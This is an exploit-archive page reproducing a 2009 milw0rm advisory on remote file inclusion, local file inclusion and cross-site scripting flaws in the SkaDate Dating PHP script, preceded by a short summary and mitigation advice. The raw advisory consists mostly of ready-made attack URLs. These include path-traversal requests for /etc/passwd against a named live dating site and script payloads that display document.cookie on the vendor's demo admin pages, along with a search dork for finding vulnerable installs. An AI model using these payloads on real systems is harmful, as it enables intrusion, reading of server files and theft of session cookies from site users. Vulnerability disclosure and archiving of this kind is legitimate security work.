header-logo
Suggest Exploit
vendor:
SkaDate Dating
by:
Moudi
8,8
CVSS
HIGH
RFI/LFI/XSS
20, 79, 352
CWE
Product Name: SkaDate Dating
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web
2020

SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities

SkaDate Dating is vulnerable to multiple remote vulnerabilities such as RFI/LFI/XSS. An attacker can exploit these vulnerabilities by sending malicious requests to the vulnerable web application. For example, an attacker can send a malicious request to the vulnerable web application with a malicious payload in the 'layout' and 'language_id' parameters. Additionally, an attacker can also exploit the XSS vulnerability by sending a malicious payload in the 'search_string' parameter.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in the application. Additionally, developers should also ensure that the application is updated with the latest security patches.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ SkaDate Dating ]
	[»] Language:           [ PHP ]
        [»] Download:           [ https://www.skadate.com/  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ Powered by SkaDate dating ]
        [»] Price:              [ $350 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : RFI/LFI vulnerability ]===	
	
[»] http://www.site.com/patch/?layout=[LFI]
[»] http://www.site.com/patch/?language_id=[LFI]

[»] http://www.site.com/patch/?language_id=[RFI]

[»] http://www.rsvpsinglelife.com/?layout=../../../../../../../../etc/passwd
[»] http://www.rsvpsinglelife.com/?language_id=../../../../../../../../etc/passwd

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/admin/auth.php/[XSS]
[»] http://www.site.com/patch/file_uploader.php/[XSS]

[»] http://www.skadate.com/demo/admin/auth.php/"><script>alert(document.cookie);</script>
[»] http://www.skadate.com/demo/file_uploader.php/"><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR